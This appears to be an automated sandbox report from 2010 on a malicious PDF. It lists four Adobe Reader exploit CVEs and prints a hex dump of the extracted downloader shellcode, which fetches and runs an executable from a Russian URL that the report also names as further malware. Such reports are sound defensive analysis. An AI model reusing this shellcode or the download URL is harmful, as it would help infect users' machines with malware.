Analysis report for jkjom_com-ChangeLog_pdf.bin

Sample Overview

File:              jkjom_com-ChangeLog_pdf.bin
MD5:               ab056c0e261160aeabe56836e21b4408
Analysis Started:  2010-02-17 17:46:47
Report Generated:  2010-02-18 00:36:03
Jsand version:     1.02.02

Detection results

Detector       | Result
Jsand 1.02.02  | malicious

Exploits

Name                        | Description                                                                                                          | Reference
Adobe Collab overflow       | Multiple Adobe Reader and Acrobat buffer overflows                                                                   | CVE-2007-5659
Adobe util.printf overflow  | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf            | CVE-2008-2992
Adobe getIcon               | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object                     | CVE-2009-0927
doc.media.newPlayer         | Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2            | CVE-2009-4324

Deobfuscation results

Evals

No evals.

Writes

No writes.

Network Activity

Requests

URL
file://jkjom_com-ChangeLog_pdf.bin

ActiveX controls

Shellcode and Malware

Hexadecimal                                        ASCII
0a 0a 0a 0a 0a 0a 0a 0a  33 c0 64 8b 40 30 78 0c   ........3.d.@0x.
8b 40 0c 8b 70 1c ad 8b  58 08 eb 09 8b 40 34 8d   .@..p...X....@4.
40 7c 8b 58 3c 6a 44 5a  d1 e2 2b e2 8b ec eb 4f   @|.X<jDZ..+....O
5a 52 83 ea 56 89 55 04  56 57 8b 73 3c 8b 74 33   ZR..V.U.VW.s<.t3
78 03 f3 56 8b 76 20 03  f3 33 c9 49 50 41 ad 33   x..V.v ..3.IPA.3
ff 36 0f be 14 03 38 f2  74 08 c1 cf 0d 03 fa 40   .6....8.t......@
eb ef 58 3b f8 75 e5 5e  8b 46 24 03 c3 66 8b 0c   ..X;.u.^.F$..f..
48 8b 56 1c 03 d3 8b 04  8a 03 c3 5f 5e 50 c3 8d   H.V........_^P..
7d 08 57 52 b8 33 ca 8a  5b e8 a2 ff ff ff 32 c0   }.WR.3..[.....2.
8b f7 f2 ae 4f b8 65 2e  65 78 ab 66 98 66 ab b0   ....O.e.ex.f.f..
6c 8a e0 98 50 68 6f 6e  2e 64 68 75 72 6c 6d 54   l...Phon.dhurlmT
b8 8e 4e 0e ec ff 55 04  93 50 33 c0 50 50 56 8b   ..N...U..P3.PPV.
55 04 83 c2 7f 83 c2 31  52 50 b8 36 1a 2f 70 ff   U......1RP.6./p.
55 04 5b 33 ff 57 56 b8  98 fe 8a 0e ff 55 04 57   U.[3.WV......U.W
b8 ef ce e0 60 ff 55 04  68 74 74 70 3a 2f 2f 79   ....`.U.http://y
6f 75 72 6e 65 77 7a 69  70 2e 72 75 3a 38 30 38   ournewzip.ru:808
30 2f 6d 61 69 6e 2e 70  68 70 3f 69 64 3d 36 26   0/main.php?id=6&
68 65 6c 6c 6f 33 31 34                            hello314

Additional (potential) malware:

URL                                               | Type | Hash | Analysis
http://yournewzip.ru:8080/main.php?id=6&hello314  | N/A  | N/A  |